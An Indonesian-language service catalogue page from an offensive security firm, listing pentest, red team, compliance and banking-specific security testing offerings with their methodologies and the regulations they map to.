
VAPT · Red team · Simulasi serangan siber
Offensive security: VAPT, pentest, dan red team.
Berpikir seperti penyerang. Merancang seperti arsitek.
Offensive security adalah pengujian keamanan siber dari sudut pandang penyerang. VAPT, red teaming, dan simulasi serangan kami jalankan sebagai satu disiplin. Ada 136 layanan untuk seluruh attack surface, dikelompokkan menurut apa yang kami uji, seberapa jauh kami menguji, dan skema pengadaannya.
136
Layanan dalam portofolio
0
False positive yang dilaporkan klien sejauh ini
83
Pengujian khusus perbankan & jasa keuangan
Cara kerja
Setiap proyek cukup tiga pilihan
Katalog ini hanya terlihat besar karena tiga pertanyaan itu sering tercampur. Begitu ketiganya dipisahkan, semuanya jadi mudah ditelusuri.
Apa yang kami uji
Attack surface: jaringan, aplikasi, cloud, sistem khusus, manusia, atau katalog mendalam untuk perbankan & jasa keuangan.
Seberapa jauh kami menguji
Tingkat kedalaman pengujian: mulai dari vulnerability assessment, lalu penetration test dan red team, sampai validasi berkelanjutan.
Skema pengadaan
Model kerja sama: proyek fixed scope, paket manday, atau langganan berkelanjutan.
Sementara itu, industri Anda hanya menentukan pilihan awal yang masuk akal untuk ketiganya. Karena itu, perbankan & jasa keuangan, sektor yang paling kami dalami, punya cakupan khusus.
Katalog lengkap
Semua 136 layanan, cukup pilih satu filter
Filter berdasarkan apa yang perlu diuji dan seberapa jauh pengujiannya, atau cari di seluruh portofolio.
Untuk siapa: industri
Yang kami uji: attack surface
Seberapa jauh kami menguji: kedalaman
Menampilkan 12 dari 136
Aplikasi · Asesmen
Secure Code Review (Manual + SAST)
Review manual pada alur yang kritikal, ditambah tool SAST untuk cakupan OWASP/CWE.
VA
Jenis pengujianVAMetodologi / standarOWASP Code Review, CWE Top 25Regulasi / konteksPCI DSS 6.3.2Aplikasi · Validasi berkelanjutan
Dynamic & Interactive App Security Testing
Scanning berkelanjutan yang terintegrasi ke CI/CD, triage, dan pengurangan false positive.
VA
Jenis pengujianVAMetodologi / standarOWASP, tool vendorRegulasi / konteksSDLC internalAplikasi · Validasi berkelanjutan
Software Composition Analysis
Risiko dependency open source, kepatuhan lisensi, dan pembuatan SBOM.
VA
Jenis pengujianVAMetodologi / standarSLSA, NTIA SBOMRegulasi / konteksKewajiban keamanan rantai pasok softwareAplikasi · Penetration test
CI/CD Pipeline Security Review
Secret yang tercecer, salah konfigurasi OIDC, rantai pasok build, dan manipulasi pipeline.
PT+VA
Jenis pengujianPT+VAMetodologi / standarSLSA, OWASP Top 10 CI/CDRegulasi / konteksSDLC internalCloud · Asesmen
Cloud Configuration Assessment
Baseline AWS/Azure/GCP/OCI dicek terhadap CIS Benchmarks dan Well-Architected dari penyedia cloud.
VA
Jenis pengujianVAMetodologi / standarCIS, AWS WAF, Azure BenchmarkRegulasi / konteksOJK POJK 11 · BSSNCloud · Penetration test
Cloud Penetration Test
Pentest cloud: eskalasi hak akses, penyalahgunaan IAM, layanan yang terekspos, dan lateral movement lintas akun.
PT
Jenis pengujianPTMetodologi / standarMITRE ATT&CK Cloud MatrixRegulasi / konteksOJK POJK 11Cloud · Penetration test
Container & Image Security Assessment
Scanning image Docker, konfigurasi runtime, dan kerapian registry.
VA+PT
Jenis pengujianVA+PTMetodologi / standarNIST SP 800-190, CIS DockerRegulasi / konteksInternalCloud · Penetration test
Kubernetes Security Assessment
RBAC, network policy, admission controller, pod escape, dan rantai pasok.
PT+VA
Jenis pengujianPT+VAMetodologi / standarCIS Kubernetes, NSA/CISA HardeningRegulasi / konteksInternalCloud · Penetration test
Serverless Security Test
Lambda/Functions, jalur serangan event-driven, cakupan izin IAM, dan injeksi cold-path.
PT
Jenis pengujianPTMetodologi / standarOWASP Serverless Top 10Regulasi / konteksInternalCloud · Asesmen
IAM & Entitlement Review (CIEM)
Role dengan hak akses berlebih, akses dorman, dan pengurangan blast radius.
VA
Jenis pengujianVAMetodologi / standarVendor + manualRegulasi / konteksOJK POJK 11Sistem khusus · Penetration test
IoT Penetration Test
Ekstraksi firmware, UART/JTAG/SWD, RF, serta aplikasi pendamping dan backend cloud.
PT
Jenis pengujianPTMetodologi / standarOWASP IoT Top 10, OWASP ISVSRegulasi / konteksInfrastruktur Informasi Vital (BSSN)Sistem khusus · Penetration test
OT / ICS / SCADA Security Assessment
Recon pasif, analisis protokol (Modbus, DNP3, S7), dan review model Purdue.
VA+PT
Jenis pengujianVA+PTMetodologi / standarIEC 62443, NIST SP 800-82Regulasi / konteksBSSN · Kementerian ESDMSistem khusus · Penetration test
Embedded & Hardware Security Test
Side-channel, fault injection, glitching, dan bypass secure boot.
PT
Jenis pengujianPTMetodologi / standarEMVCo, Common CriteriaRegulasi / konteksCommon Criteria · EMVCoSistem khusus · Penetration test
Automotive / ECU Security Test
CAN bus, firmware ECU, telematika kendaraan, dan V2X.
PT
Jenis pengujianPTMetodologi / standarISO/SAE 21434, UNECE WP.29Regulasi / konteksUNECE WP.29 R155Sistem khusus · Penetration test
Smart Contract Audit
Solidity/Vyper, reentrancy, manipulasi oracle, dan keamanan bridge.
VA+PT
Jenis pengujianVA+PTMetodologi / standarSWC Registry, best practice ConsenSysRegulasi / konteksBappebti (aset kripto Indonesia)Sistem khusus · Penetration test
AI/ML Security Assessment
Input adversarial, prompt injection, ekstraksi model, dan data poisoning.
PT+VA
Jenis pengujianPT+VAMetodologi / standarOWASP LLM Top 10, NIST AI RMF, MITRE ATLASRegulasi / konteksKebijakan AI yang sedang berkembangSistem khusus · Penetration test
LLM Application & Agent Security Test
Prompt injection, penyalahgunaan tool, RAG poisoning, dan batas kewenangan agent.
PT
Jenis pengujianPTMetodologi / standarOWASP LLM Top 10Regulasi / konteksTata kelola AI internalSistem khusus · Penetration test
MFP / Print / IPMI / BMC Test
Perangkat yang terhubung ke jaringan, akses out-of-band BMC, dan kredensial default.
PT
Jenis pengujianPTMetodologi / standarNIST 800-115Regulasi / konteksInternalManusia & simulasi serangan · Penetration test
Phishing & Social Engineering Simulation
Simulasi phishing lewat email, SMS, dan telepon: click rate, kredensial yang berhasil dijaring, dan peningkatan security awareness.
PT
Jenis pengujianPTMetodologi / standarPTES, kustomRegulasi / konteksOJK POJK 11Manusia & simulasi serangan · Penetration test
Physical Penetration Test
Tailgating, lock picking, kloning kartu akses (HID/MIFARE), dan bypass pengamanan fasilitas.
PT
Jenis pengujianPTMetodologi / standarASIS, OSSTMM PhysicalRegulasi / konteksOJK POJK 11Manusia & simulasi serangan · Red team
Full-Scope Red Team Engagement
Simulasi serangan siber yang senyap, multi-vektor, dan berbasis tujuan selama beberapa minggu, menghadapi pertahanan Anda yang sedang aktif.
PT
Jenis pengujianPTMetodologi / standarMITRE ATT&CK, model TIBER-EURegulasi / konteksThreat-led testing OJKManusia & simulasi serangan · Purple team
Purple Team Exercise
Kolaborasi red team dan blue team, peningkatan detection engineering, dan peta cakupan ATT&CK.
PT+Advisory
Jenis pengujianPT+AdvisoryMetodologi / standarMITRE ATT&CK, Atomic Red TeamRegulasi / konteksInternalManusia & simulasi serangan · Red team
Threat-Informed Adversary Emulation
Meniru threat actor tertentu (FIN7, APT29, Lazarus) sesuai profil ancaman Anda.
PT
Jenis pengujianPTMetodologi / standarMITRE ATT&CK, berbasis threat intelligenceRegulasi / konteksThreat-led testing OJKManusia & simulasi serangan · Red team
Assumed-Breach Assessment
Mulai dari posisi penyerang yang sudah di dalam, lalu ukur deteksi dan lateral movement.
PT
Jenis pengujianPTMetodologi / standarMITRE ATT&CKRegulasi / konteksOJK POJK 11Validasi berkelanjutan · Validasi berkelanjutan
Breach & Attack Simulation Program
Eksekusi TTP otomatis dan berkelanjutan untuk menguji kontrol deteksi dan pencegahan.
VA+Advisory
Jenis pengujianVA+AdvisoryMetodologi / standarMITRE ATT&CK, platform vendor (misalnya AttackIQ, Cymulate)Regulasi / konteksInternalValidasi berkelanjutan · Validasi berkelanjutan
Continuous Threat Exposure Management
Siklus CTEM Gartner: scoping, discovery, prioritization, validation, dan mobilization.
Advisory+VA
Jenis pengujianAdvisory+VAMetodologi / standarGartner CTEMRegulasi / konteksOJK POJK 11Validasi berkelanjutan · Asesmen
External Attack Surface Management
Pemetaan aset eksternal secara berkelanjutan, shadow IT, kredensial bocor, dan dark web.
VA
Jenis pengujianVAMetodologi / standarTool vendor + manualRegulasi / konteksOJK POJK 11Validasi berkelanjutan · Penetration test
Detection Engineering Validation
Uji cakupan rule SIEM/EDR/XDR terhadap TTP nyata, lengkap dengan peta cakupan MITRE.
PT+Advisory
Jenis pengujianPT+AdvisoryMetodologi / standarMITRE ATT&CK, Atomic Red TeamRegulasi / konteksInternalAdvisory & Kepatuhan · Penetration test
PCI DSS 11.4 Penetration Test (Internal/External/Segmentation/App)
Pentest PCI DSS Persyaratan 11.4 dengan ruang lingkup penuh, sebagai bukti untuk QSA.
PT
Jenis pengujianPTMetodologi / standarPCI DSS v4.0.1Regulasi / konteksPCI DSS v4.0.1Advisory & Kepatuhan · Penetration test
ISO 27001 Technical Testing & Gap Assessment
Bukti teknis untuk kontrol Annex A, ditambah gap analysis.
VA+Advisory
Jenis pengujianVA+AdvisoryMetodologi / standarISO/IEC 27001:2022, 27002Regulasi / konteksISO 27001Advisory & Kepatuhan · Penetration test
SOC 2 Penetration Test & Readiness
Kesiapan Type I/II dan bukti kontrol teknis untuk Trust Services Criteria.
PT+Advisory
Jenis pengujianPT+AdvisoryMetodologi / standarAICPA TSCRegulasi / konteksPermintaan pelangganAdvisory & Kepatuhan · Penetration test
OJK / BSSN / BI Regulatory Testing
Dipetakan ke POJK 11, ketentuan BSSN untuk Infrastruktur Informasi Vital (IIV), dan kepatuhan BI SNAP/BI-FAST.
PT+Advisory
Jenis pengujianPT+AdvisoryMetodologi / standarPOJK 11, panduan BSSNRegulasi / konteksOJK · BSSNAdvisory & Kepatuhan · Penetration test
MAS TRM / RBI / HKMA Aligned Testing
Untuk perusahaan Indonesia yang punya operasi atau counterparty di negara lain di kawasan ini.
PT+Advisory
Jenis pengujianPT+AdvisoryMetodologi / standarMAS TRM, RBI, HKMARegulasi / konteksMAS · RBIAdvisory & Kepatuhan · Advisory
Threat Modeling Workshop
STRIDE/PASTA/attack tree untuk aplikasi dan arsitektur yang kritikal.
Advisory
Jenis pengujianAdvisoryMetodologi / standarSTRIDE, PASTA, MITRERegulasi / konteksSDLC internalAdvisory & Kepatuhan · Advisory
Security Architecture Review
Membandingkan arsitektur acuan dengan kondisi saat ini, lalu menyusun gap analysis kontrol.
Advisory
Jenis pengujianAdvisoryMetodologi / standarSABSA, NIST CSFRegulasi / konteksOJK POJK 11Advisory & Kepatuhan · Penetration test
Configuration Audit & Hardening Review
CIS Benchmarks untuk baseline OS, database, jaringan, dan cloud.
VA+Advisory
Jenis pengujianVA+AdvisoryMetodologi / standarCIS BenchmarksRegulasi / konteksISO 27001 · OJK POJK 11Advisory & Kepatuhan · Penetration test
Database Security Assessment
Konfigurasi di level database, DAM, pemetaan data sensitif, dan enkripsi.
VA+PT
Jenis pengujianVA+PTMetodologi / standarCIS DB Benchmarks, OWASPRegulasi / konteksPCI DSS · OJK POJK 11Advisory & Kepatuhan · Advisory
Vulnerability Management Program Design
Program operasional: SLA, penanggung jawab, dan prioritas berbasis risiko (EPSS+CVSS).
Advisory
Jenis pengujianAdvisoryMetodologi / standarNIST 800-40, EPSS, FIRSTRegulasi / konteksOJK POJK 11Advisory & Kepatuhan · Advisory
Patch Management & Prioritization Advisory
Kerangka patching berbasis risiko dengan EPSS/CVSS/kritikalitas aset.
Advisory
Jenis pengujianAdvisoryMetodologi / standarNIST 800-40Regulasi / konteksOJK POJK 11Advisory & Kepatuhan · Penetration test
Validasi remediasi / retest
Retest (uji ulang) atas temuan sebelumnya setelah remediasi.
PT
Jenis pengujianPTMetodologi / standarInternalRegulasi / konteksOJK POJK 11 · PCI DSSAdvisory & Kepatuhan · Advisory
Post-Quantum Cryptography Readiness Assessment
Inventaris kriptografi, risiko algoritma, dan roadmap migrasi PQC (ML-KEM, ML-DSA).
Advisory+VA
Jenis pengujianAdvisory+VAMetodologi / standarNIST FIPS 203/204/205, NCSC PQCRegulasi / konteksPersiapan jangka panjangCore banking & back office · Penetration test
Core Banking VAPT (Temenos / Finacle / Flexcube / Silverlake / Mambu)
Eskalasi hak akses, manipulasi transaksi, dan integritas GL di platform core banking.
PT
Jenis pengujianPTMetodologi / standarPTES, OWASP, panduan khusus vendorRegulasi / konteksOJK POJK 11Core banking & back office · Penetration test
Batch & EOD Processing Security Test
Intersepsi file batch, validasi tanda tangan digital, dan manipulasi rekonsiliasi.
PT
Jenis pengujianPTMetodologi / standarPTES, kustomRegulasi / konteksOJK POJK 11Core banking & back office · Penetration test
General Ledger Integrity Test
Jurnal tanpa otorisasi, bypass dual control, dan manipulasi posting.
PT
Jenis pengujianPTMetodologi / standarKustom + COSORegulasi / konteksOJK POJK 11 · audit internalCore banking & back office · Penetration test
Treasury & ALM System Test
Manipulasi posisi dan rate, serta bypass limit.
PT
Jenis pengujianPTMetodologi / standarKustomRegulasi / konteksOJK POJK 11Core banking & back office · Penetration test
Loan Origination & Credit Decisioning Review
Manipulasi scorecard, bypass rule, dan celah dual control dalam proses persetujuan.
PT+VA
Jenis pengujianPT+VAMetodologi / standarKustomRegulasi / konteksOJK POJK 11Core banking & back office · Penetration test
Trade Finance Platform Test
Penerbitan LC, workflow dokumen, dan eksposur pesan SWIFT seri MT700.
PT
Jenis pengujianPTMetodologi / standarKustom + SWIFTRegulasi / konteksOJK POJK 11 · SWIFT CSPCore banking & back office · Penetration test
Reconciliation & Nostro/Vostro Review
Eksploitasi selisih rekonsiliasi dan penyalahgunaan suspense account.
VA+PT
Jenis pengujianVA+PTMetodologi / standarKustomRegulasi / konteksOJK POJK 11Sistem & jaringan pembayaran · Penetration test
Payment Switch Test (Postilion / Way4 / BASE24 / OpenWay / Connex)
Logika switch, manipulasi pesan ISO 8583, fallback authorization, dan validasi cryptogram.
PT
Jenis pengujianPTMetodologi / standarPTES, ISO 8583, dokumentasi vendorRegulasi / konteksPCI DSS · OJK POJK 11Sistem & jaringan pembayaran · Penetration test
HSM Review (Thales payShield / Atalla / Utimaco)
Key ceremony, pengelolaan LMK, command whitelisting, dan dual control.
VA+PT
Jenis pengujianVA+PTMetodologi / standarPCI PIN, PCI HSMRegulasi / konteksPCI HSM · PCI PINSistem & jaringan pembayaran · Penetration test
Payment Gateway VAPT
Sisi merchant dan sisi acquirer, alur tokenisasi, dan penyalahgunaan refund.
PT
Jenis pengujianPTMetodologi / standarOWASP + PCI DSSRegulasi / konteksPCI DSSSistem & jaringan pembayaran · Penetration test
3D Secure 2 (3DS2) Implementation Review
Pengujian ACS/DS, penyalahgunaan frictionless flow, dan validasi OOB.
PT
Jenis pengujianPTMetodologi / standarEMVCo 3DS2Regulasi / konteksEMVCo · aturan prinsipal kartuSistem & jaringan pembayaran · Penetration test
Tokenization Service Assessment
Keamanan vault, kontrol detokenisasi, dan validasi pengurangan ruang lingkup.
PT+VA
Jenis pengujianPT+VAMetodologi / standarPCI DSS Tokenization GuidelinesRegulasi / konteksPCI DSSSistem & jaringan pembayaran · Penetration test
ATM Penetration Test (NCR / Diebold Nixdorf / Hyosung)
Serangan black box, jackpotting (varian Cutlet Maker / WinPot), penyalahgunaan XFS, dan serangan jaringan.
PT
Jenis pengujianPTMetodologi / standarNIST + vendor + metode khusus ATMRegulasi / konteksOJK POJK 11Sistem & jaringan pembayaran · Penetration test
POS / EDC Terminal Test (incl. Android Smart POS)
Firmware terminal, alur pembayaran, integrasi telko, dan hardening POS Android.
PT
Jenis pengujianPTMetodologi / standarPCI PTS, vendorRegulasi / konteksPCI PTSSistem & jaringan pembayaran · Penetration test
Card Production / Personalization Audit
Selaras CPSA, pengelolaan kunci, dan keamanan embossing/encoding.
VA+Advisory
Jenis pengujianVA+AdvisoryMetodologi / standarVisa/Mastercard CPSARegulasi / konteksVisa/MC CPSAInfrastruktur pembayaran Indonesia · Penetration test
QRIS Implementation Security Review
QR statis dan dinamis, alur MPM/CPM, dan keamanan agregator merchant.
PT+VA
Jenis pengujianPT+VAMetodologi / standarSpesifikasi QRIS BI, OWASPRegulasi / konteksBank Indonesia QRISInfrastruktur pembayaran Indonesia · Penetration test
BI-FAST Integration Security Test
Keamanan di sisi peserta, penyalahgunaan layanan proxy address, dan integritas transaksi.
PT
Jenis pengujianPTMetodologi / standarSpesifikasi BI-FAST, kustomRegulasi / konteksBank Indonesia BI-FASTInfrastruktur pembayaran Indonesia · Penetration test
SNAP API Security Assessment
Standar Nasional Open API Pembayaran (SNAP) dari BI: signature, OAuth, dan integritas pesan.
PT+VA
Jenis pengujianPT+VAMetodologi / standarSpesifikasi SNAP BI, OWASP APIRegulasi / konteksBank Indonesia SNAPInfrastruktur pembayaran Indonesia · Penetration test
GPN Integration Review
Integrasi Gerbang Pembayaran Nasional dan kepatuhan NSICCS.
PT+VA
Jenis pengujianPT+VAMetodologi / standarSpesifikasi GPN, NSICCSRegulasi / konteksBank Indonesia GPNInfrastruktur pembayaran Indonesia · Penetration test
E-Wallet Platform VAPT (DANA/OVO/GoPay-style)
Alur top-up, penyalahgunaan transfer P2P, eksploitasi tier KYC, dan onboarding merchant.
PT
Jenis pengujianPTMetodologi / standarOWASP, PTESRegulasi / konteksIzin uang elektronik BI · POJKKeamanan kanal layanan · Penetration test
Internet Banking VAPT (Retail + Corporate)
Business logic khusus kanal, alur maker-checker, dan penyalahgunaan pembayaran massal.
PT
Jenis pengujianPTMetodologi / standarOWASP WSTGRegulasi / konteksOJK POJK 11Keamanan kanal layanan · Penetration test
Mobile Banking Pentest (iOS + Android)
Pentest aplikasi mobile banking: MASVS, RASP, biometrik, device binding, dan deteksi jailbreak/root.
PT
Jenis pengujianPTMetodologi / standarOWASP MASVS/MASTGRegulasi / konteksOJK POJK 11Keamanan kanal layanan · Penetration test
Corporate / Cash Management Portal Test
Bypass maker-checker, manipulasi file pembayaran massal, dan penyalahgunaan sertifikat.
PT
Jenis pengujianPTMetodologi / standarOWASP WSTG + kustomRegulasi / konteksOJK POJK 11Keamanan kanal layanan · Penetration test
USSD Banking Security Test
Integritas sesi, antarmuka telko, dan kelemahan OTP.
PT
Jenis pengujianPTMetodologi / standarKustomRegulasi / konteksOJK POJK 11Keamanan kanal layanan · Penetration test
IVR / Phone Banking Test
Bypass biometrik suara, pencurian OTP, dan social engineering.
PT
Jenis pengujianPTMetodologi / standarKustom + ADVRegulasi / konteksOJK POJK 11Keamanan kanal layanan · Penetration test
Branch & Teller System Test
Aplikasi front office, kontrol USB, penyalahgunaan perangkat periferal, dan fraud internal.
PT
Jenis pengujianPTMetodologi / standarKustomRegulasi / konteksOJK POJK 11Keamanan kanal layanan · Penetration test
Chatbot & LLM Banking Assistant Test
Prompt injection di alur transaksi, penyalahgunaan intent, dan batas kewenangan agent.
PT
Jenis pengujianPTMetodologi / standarOWASP LLM Top 10Regulasi / konteksOJK POJK 11 · kebijakan AISWIFT & pembayaran lintas negara · Advisory
SWIFT CSP CSCF Assessment (Mandatory Annual)
Atestasi Customer Security Programme terhadap kontrol CSCF.
Advisory+VA
Jenis pengujianAdvisory+VAMetodologi / standarSWIFT CSCFRegulasi / konteksSWIFT CSPSWIFT & pembayaran lintas negara · Penetration test
SWIFT Environment Penetration Test
Alliance Access/Lite2, segregasi, RMA, dan integritas file pembayaran.
PT
Jenis pengujianPTMetodologi / standarSWIFT CSCF, PTESRegulasi / konteksSWIFT CSPSWIFT & pembayaran lintas negara · Red team
SWIFT Red Team / Bangladesh-style Scenario
Simulasi serangan terhadap secure zone SWIFT, dijalankan senyap dan bertahap.
PT
Jenis pengujianPTMetodologi / standarMITRE ATT&CK + SWIFTRegulasi / konteksSWIFT CSP · threat-led testing OJKSWIFT & pembayaran lintas negara · Penetration test
Correspondent Banking System Review
Integrasi lintas negara, RMA, dan alur screening.
PT+Advisory
Jenis pengujianPT+AdvisoryMetodologi / standarSWIFT, FATFRegulasi / konteksSWIFT CSP · aturan APU PPT (AML)SWIFT & pembayaran lintas negara · Asesmen
Alliance Access / Gateway Configuration Audit
RBAC, pengelolaan sertifikat, dan pemisahan yurisdiksi.
VA
Jenis pengujianVAMetodologi / standarSWIFT CSCFRegulasi / konteksSWIFT CSPPasar modal & trading · Penetration test
Trading & Order Management Platform VAPT
Tampering pada order, penyalahgunaan latensi, dan manipulasi jalur eksekusi.
PT
Jenis pengujianPTMetodologi / standarPTES + kustomRegulasi / konteksOJK Pasar ModalPasar modal & trading · Penetration test
FIX Protocol Implementation Test
Penyalahgunaan di level sesi, tampering pesan, dan replay.
PT
Jenis pengujianPTMetodologi / standarFIX Trading CommunityRegulasi / konteksOJK Pasar ModalPasar modal & trading · Penetration test
Market Data Feed Integrity Review
Tampering, replay, dan penyalahgunaan selisih latensi.
PT+Advisory
Jenis pengujianPT+AdvisoryMetodologi / standarKustomRegulasi / konteksOJK Pasar ModalPasar modal & trading · Penetration test
Algorithmic Trading Platform Assessment
Isolasi strategi, kill-switch, dan pencegahan manipulasi pasar.
PT+Advisory
Jenis pengujianPT+AdvisoryMetodologi / standarKustom + MARRegulasi / konteksOJK Pasar ModalPasar modal & trading · Penetration test
Custody, Settlement & KSEI Integration Review
Integritas file setelmen dan kontrol rekening kustodian.
PT+Advisory
Jenis pengujianPT+AdvisoryMetodologi / standarKustomRegulasi / konteksOJK · KSEIKartu & PCI DSS · Penetration test
PCI DSS 11.4 Annual Pentest (Internal/External/Segmentation/App)
Ruang lingkup penuh Persyaratan 11.4, sebagai paket bukti untuk QSA.
PT
Jenis pengujianPTMetodologi / standarPCI DSS v4.0.1Regulasi / konteksPCI DSS v4.0.1Kartu & PCI DSS · Penetration test
CDE Scoping & Segmentation Validation
Menentukan dan memvalidasi upaya mempersempit ruang lingkup PCI.
VA+Advisory
Jenis pengujianVA+AdvisoryMetodologi / standarPanduan scoping PCI DSSRegulasi / konteksPCI DSSKartu & PCI DSS · Advisory
Visa AIS / MC SDP / PCI 3DS / PCI PIN Assessment
Validasi kontrol dan pelaporan sesuai aturan tiap prinsipal kartu.
Advisory+VA
Jenis pengujianAdvisory+VAMetodologi / standarVisa AIS, MC SDP, PCI 3DS, PCI PINRegulasi / konteksVisa · MastercardKartu & PCI DSS · Penetration test
Issuer Processor System Test
Alur otorisasi, kliring, dan setelmen; validasi cryptogram.
PT
Jenis pengujianPTMetodologi / standarKustom + PCIRegulasi / konteksPCI DSS · aturan prinsipalOpen banking & API · Penetration test
Open Banking API Penetration Test
OWASP API Top 10 + logika bisnis perbankan dan integritas alur consent.
PT
Jenis pengujianPTMetodologi / standarOWASP API, FAPIRegulasi / konteksBI SNAP · FAPIOpen banking & API · Penetration test
Third-Party Provider (TPP) Integration Test
Penyalahgunaan alur di sisi TPP, redirection, dan pencabutan consent.
PT
Jenis pengujianPTMetodologi / standarOWASP, FAPIRegulasi / konteksBI SNAP · FAPIOpen banking & API · Penetration test
Consent & Authorization Flow Review (OAuth/FAPI/PKCE/JARM)
Integritas consent, token binding, dan serangan berbasis redirection.
PT+Advisory
Jenis pengujianPT+AdvisoryMetodologi / standarOAuth 2.0, FAPI 1/2Regulasi / konteksBI SNAP · FAPIOpen banking & API · Penetration test
Strong Customer Authentication Flow Test
Integritas alur SCA, biometrik, OTP, dan transaction binding.
PT
Jenis pengujianPTMetodologi / standarPSD2 / FAPI / SNAPRegulasi / konteksBI SNAP · aturan prinsipalFintech & pinjaman digital · Penetration test
P2P Lending Platform VAPT (POJK 10)
Pemisahan alur penerima/pemberi dana, integritas escrow, dan penyalahgunaan tier KYC.
PT
Jenis pengujianPTMetodologi / standarOWASP + kustomRegulasi / konteksOJK POJK 10/2022Fintech & pinjaman digital · Penetration test
BNPL Platform Test
Penyalahgunaan soft KYC, manipulasi limit kredit, dan fraud multi-akun.
PT
Jenis pengujianPTMetodologi / standarOWASP + kustomRegulasi / konteksOJK POJKFintech & pinjaman digital · Penetration test
Robo-Advisor Security Review
Penyalahgunaan engine portofolio, manipulasi aturan rekomendasi investasi, dan integrasi kustodian.
PT+Advisory
Jenis pengujianPT+AdvisoryMetodologi / standarKustomRegulasi / konteksOJK Pasar ModalFintech & pinjaman digital · Penetration test
Embedded Finance API Test
Integrasi BaaS / open banking, identitas mitra, dan sinyal fraud.
PT
Jenis pengujianPTMetodologi / standarOWASP APIRegulasi / konteksBI SNAPFintech & pinjaman digital · Penetration test
Digital Onboarding / e-KYC Test
Bypass liveness, manipulasi dokumen, injeksi OCR, dan ketahanan terhadap deepfake.
PT+VA
Jenis pengujianPT+VAMetodologi / standarISO 30107, kustomRegulasi / konteksOJK e-KYC · BIFintech & pinjaman digital · Penetration test
Crypto Exchange VAPT
Pemisahan hot/cold wallet, alur penarikan, dan engine trading internal.
PT
Jenis pengujianPTMetodologi / standarKustom + OWASP + khusus kriptoRegulasi / konteksBappebti · OJKFintech & pinjaman digital · Penetration test
Smart Contract Audit (DeFi / Tokenization)
Solidity, reentrancy, penyalahgunaan oracle, dan keamanan bridge.
VA+PT
Jenis pengujianVA+PTMetodologi / standarSWC RegistryRegulasi / konteksBappebti · OJKAnti-fraud & AML · Penetration test
Fraud Detection System Effectiveness Test
Pola transaksi adversarial, model evasion, dan manipulasi threshold.
PT+VA
Jenis pengujianPT+VAMetodologi / standarMITRE ATLAS, kustomRegulasi / konteksOJK POJK 11Anti-fraud & AML · Penetration test
AML Transaction Monitoring System Review
Kelengkapan rule, upaya mengakali threshold, dan analisis false negative.
VA+Advisory
Jenis pengujianVA+AdvisoryMetodologi / standarFATF, kustomRegulasi / konteksPPATK (FIU Indonesia) · FATFAnti-fraud & AML · Penetration test
Sanctions Screening Test
Bypass fuzzy matching, penyamaran nama, dan celah proses batch/real-time.
VA+PT
Jenis pengujianVA+PTMetodologi / standarOFAC, Uni Eropa, PBB, kustomRegulasi / konteksOFAC · PBBAnti-fraud & AML · Penetration test
Behavioral Biometrics Evaluation
Bot vs manusia, serta efektivitas deteksi account takeover.
PT
Jenis pengujianPTMetodologi / standarKustomRegulasi / konteksOJK POJK 11Anti-fraud & AML · Penetration test
Device Fingerprinting & Bot Defense Test
Bypass deteksi bot, spoofing fingerprint, dan celah telemetri fraud.
PT
Jenis pengujianPTMetodologi / standarKustomRegulasi / konteksOJK POJK 11Threat-led testing · Penetration test
Threat-Led Penetration Test (model TIBER-EU untuk Indonesia)
Pengujian senyap berbasis intelijen dan skenario, meniru TTP yang menyasar bank di kawasan ini.
PT
Jenis pengujianPTMetodologi / standarTIBER-EU, CBEST, MITRERegulasi / konteksThreat-led testing OJK (sedang berkembang)Threat-led testing · Penetration test
Carbanak / Lazarus / FIN7 Banking Scenario
Simulasi serangan siber terarah, meniru kelompok penyerang yang aktif menyasar bank.
PT
Jenis pengujianPTMetodologi / standarMITRE ATT&CK + CTIRegulasi / konteksOJK POJK 11Threat-led testing · Penetration test
Insider Threat / Dealer-Room Simulation
Penyalahgunaan akun privileged, fraud oleh dealer, dan lateral movement internal.
PT
Jenis pengujianPTMetodologi / standarMITRE ATT&CKRegulasi / konteksOJK POJK 11Threat-led testing · Red team
Assumed-Breach vs SWIFT and Core Banking Zones
Pengujian dari foothold awal sampai target di zona pembayaran yang sudah dipisahkan.
PT
Jenis pengujianPTMetodologi / standarMITRE ATT&CK + SWIFT CSPRegulasi / konteksSWIFT CSP · OJKThreat-led testing · Purple team
Banking-Specific Purple Team Exercise
Meningkatkan kemampuan SOC menghadapi TTP khas perbankan (pembayaran, SWIFT, kanal layanan).
PT+Advisory
Jenis pengujianPT+AdvisoryMetodologi / standarMITRE ATT&CK + atomic testRegulasi / konteksOJK POJK 11Ketahanan & kelangsungan bisnis · Advisory
Asesmen ketahanan siber (BCBS / OJK POJK 11)
Prinsip ketahanan operasional, dengan skenario berat namun masuk akal (severe but plausible).
Advisory+VA
Jenis pengujianAdvisory+VAMetodologi / standarBCBS Op Res, OJK POJK 11Regulasi / konteksOJK POJK 11 · BCBSKetahanan & kelangsungan bisnis · Penetration test
DR/BCP Failover Security Validation
Eksposur DRC (situs sekunder), keamanan jalur replikasi, dan integritas pemulihan.
PT+VA
Jenis pengujianPT+VAMetodologi / standarISO 22301, kustomRegulasi / konteksOJK POJK 11Ketahanan & kelangsungan bisnis · Advisory
Ransomware Readiness Assessment
Backup immutable, validasi waktu pemulihan, dan tabletop exercise berbasis skenario.
Advisory+PT
Jenis pengujianAdvisory+PTMetodologi / standarNIST, BCBSRegulasi / konteksOJK POJK 11Ketahanan & kelangsungan bisnis · Penetration test
DDoS Simulation (Channel Availability)
DDoS L3/L4/L7 dan ketahanan kanal saat beban puncak (terutama Lebaran dan tanggal gajian).
PT
Jenis pengujianPTMetodologi / standarKustomRegulasi / konteksOJK POJK 11Infrastruktur & sistem khusus · Penetration test
HSM and Key Management System Audit
Key lifecycle, key ceremony, kontrol akses, dan validasi FIPS.
VA+Advisory
Jenis pengujianVA+AdvisoryMetodologi / standarFIPS 140-2/3, PCI HSM/PINRegulasi / konteksPCI HSM/PIN · OJKInfrastruktur & sistem khusus · Penetration test
PAM Review (CyberArk / BeyondTrust / Delinea)
Arsitektur privileged access (PAM), pemantauan sesi, dan integritas vault.
VA+PT
Jenis pengujianVA+PTMetodologi / standarCIS, panduan vendorRegulasi / konteksOJK POJK 11Infrastruktur & sistem khusus · Penetration test
AD Tiering / ESAE / Red Forest Review
Validasi model administrasi Tier-0/1/2.
VA+PT
Jenis pengujianVA+PTMetodologi / standarMS Tiering, PingCastleRegulasi / konteksOJK POJK 11Infrastruktur & sistem khusus · Penetration test
Database Activity Monitoring Effectiveness
Cakupan rule DAM, blind spot, dan pemantauan DBA dengan akses privileged.
VA+PT
